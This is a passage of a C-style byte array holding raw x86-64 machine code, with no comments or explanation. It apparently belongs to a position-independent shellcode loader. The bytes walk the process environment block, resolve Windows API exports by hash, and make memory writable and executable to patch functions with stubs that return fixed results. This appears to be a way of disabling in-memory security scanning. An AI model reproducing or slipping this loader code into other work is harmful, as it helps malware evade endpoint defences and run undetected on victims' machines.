1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
